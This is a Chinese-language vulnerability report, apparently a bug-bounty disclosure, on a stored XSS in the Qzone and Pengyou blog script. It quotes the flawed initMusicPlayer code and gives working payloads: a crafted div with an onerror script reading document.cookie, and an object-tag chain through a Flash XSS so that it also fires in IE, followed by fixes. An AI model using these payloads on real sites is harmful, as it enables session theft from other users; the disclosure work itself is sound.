此漏洞影响腾讯2大主要的社区日志功能,qq空间和朋友网的前端和后端是一套逻辑,就不分开提交了。漏洞相关信息日后会同步至pkav.net。
缺陷文件:
http://cnc.qzs.qq.com/qzone/newblog/v5/script/common.js
http://qzs.pengyou.com/qzone/newblog/v5/script/common.js
缺陷代码:
QZBlog.Logic.initMusicPlayer = function() {
var arr = document.getElementsByName("musicFlash**");
if (arr.length > 0) {
var musicParams = [];
for (var index = 0; index < arr.length; ++index) {
var ubb = arr[index].getAttribute('ubb');
if ( !! ubb) {
musicParams.push(ubb);
if (!QZFL.userAgent.ie) {
var is_multi = ubb.split("|").length > 7;
var width = arr[index].width;
var height = arr[index].height;
var _div_height = is_multi ? 200: 120;
var _div_width = is_multi ? 386: 360;
var src = 'http://' + IMGCACHE_DOMAIN + '/music/musicbox_v2_1/img/MusicFlash.swf';
var span = document.createElement('span');
span.style.cssText = 'display:inline-block; height:' + _div_height + 'px;width:' + _div_width + 'px; overflow:hidden; vertical-align:baseline';
var parent = arr[index].parentNode;
parent.replaceChild(span, arr[index]);
span.innerHTML = '<object type="application/x-shockwave-flash" data="' + src + '" width="' + width + '" height="' + height + '" name="musicFlash' + (musicParams.length - 1) + '" id="musicFlash' + (musicParams.length - 1) + '" align="middle" ubb="' + ubb + '">' + '<param name="movie" value="' + src + '" />' + '<param name="quality" value="high" />' + '<param name="bgcolor" value="#ffffff" />' + '<param name="play" value="true" />' + '<param name="loop" value="true" />' + '<param name="wmode" value="transparent" />' + '<param name="scale" value="showall" />' + '<param name="menu" value="true" />' + '<param name="salign" value="" />' + '<param name="allowScriptAccess" value="always" />' + '</object></span>';
index--;
} else {
arr[index].id = "musicFlash" + (musicParams.length - 1);
if (QZFL.userAgent.ie < 9) {
arr[index].name = "musicFlash" + (musicParams.length - 1);
}
}
}
}
if (musicParams.length > 0) {
var jsLoader = new QZONE.jsLoader();
jsLoader.onload = function() {
initMusicData.apply(null, musicParams);
};
jsLoader.load("/music/musicbox_v2_1/js/musicblog_player.js", document, "GB2312");
}
}
};
1. 首先看看上面这个代码。
2. 它的大致流程如下:
2.1 搜索日志里所有name="musicFlash**"的元素。然后循环对每一个元素处理
2.2 拿一次循环为例,可以看到取出了name="musicFlash**"元素的 ubb 属性。
2.3 而后,在span.innerHTML这段代码中, ubb="' + ubb + '" 这个地方直接加了进去。
2.4 因此这里没有做过滤,会造成XSS。
3. 那么利用代码怎么写呢?
因为日志功能是富文本,不可能屏蔽掉所有的HTML标签。div 标记一般是允许的。那么我们利用div来编写利用代码。
<div name="musicFlash**" ubb="">;lt/object><img src="1" onerror="alert(document.cookie);"><i a="">xxxxxxxxx</div>
嗯,上面就是利用代码了,很简单吧,发日志的时候,选择使用HTML方式,发送即可。
其它用户访问日志后,效果如下:
打开调试工具,可以看到被inject进去的代码
4. 当然,还没完。。。 因为上面这个代码缺陷,仅限于非IE浏览器,为什么呢?
主要是这句:如下图:www.atcpu.com
5. 我们的目标是:“没有蛀牙”,只有chrome下可以,有点鸡肋了。
6. 其实这里还存在一个问题。最初测试时,发现腾讯并没有过滤掉object标签,只是对object调用的swf文件的域进行了限制。也就是说 ,发送一下HTML,是不会被过滤掉的
<div class="blog_details_20120222"><div><object codeBase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="410" height="100" src="http://qzs.qq.com/22222222222.swf" bgcolor="#ffffff" menu="true" allowScriptAccess="always" name="musicFlash**" id="musicFlash0" ubb='3041135817|1|http://1.qq.com/1"><img/src="1"onerror="alert(1)">'><param name="movie" value="http://qzs.qq.com/22222222222.swf" /><param name="data" value="http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" /><param name="bgColor" value="#ffffff" /><param name="wmode" value="transparent" /><param name="menu" value="true" /><param name="allowScriptAccess" value="always" /></object><br></div></div>
只要 movie的value是 http://qzs.qq.com域名下即可
7. 更重要的是,这里的allowscriptaccess是等于always的。
8. 那么我们只要找到一个 http://qzs.qq.com 域名下,具有缺陷的FLASH XSS即可。
9. google , site:qzs.qq.com filetype:swf ,找到下面这个。
http://qzs.qq.com/qzone/mall/app/vip_reward/201110/swf/play.swf?flashInit=function(){alert(document.cookie)}
10. 接着我们在发布日志时,发布以下利用代码即可。
<div class="blog_details_20120222"><div><object codeBase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="410" height="100" src="http://qzs.qq.com/qzone/mall/app/vip_reward/201110/swf/play.swf?flashInit=function(){alert(document.cookie)}" bgcolor="#ffffff" menu="true" allowScriptAccess="always" name="musicFlash**" id="musicFlash0" ubb='3041135817|1|http://1.qq.com/1"><img/src="1"onerror="alert(1)">'><param name="movie" value="http://qzs.qq.com/qzone/mall/app/vip_reward/201110/swf/play.swf?flashInit=function(){alert(document.cookie)}" /><param name="data" value="http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" /><param name="bgColor" value="#ffffff" /><param name="wmode" value="transparent" /><param name="menu" value="true" /><param name="allowScriptAccess" value="always" /></object><br></div></div>
11. 看吧,这次IE也会弹啦。
修复方案:
1. 修复 QZBlog.Logic.initMusicPlayer 中的缺陷,取出ubb属性后,进行二次过滤,再输出到innerHTML。
2. 这个object的always,你们自己看着修复。本身object标签就是很危险的,感觉不应该直接输出到页面。
3. 修复 http://qzs.qq.com/qzone/mall/app/vip_reward/201110/swf/play.swf?flashInit=function(){alert(document.cookie)}
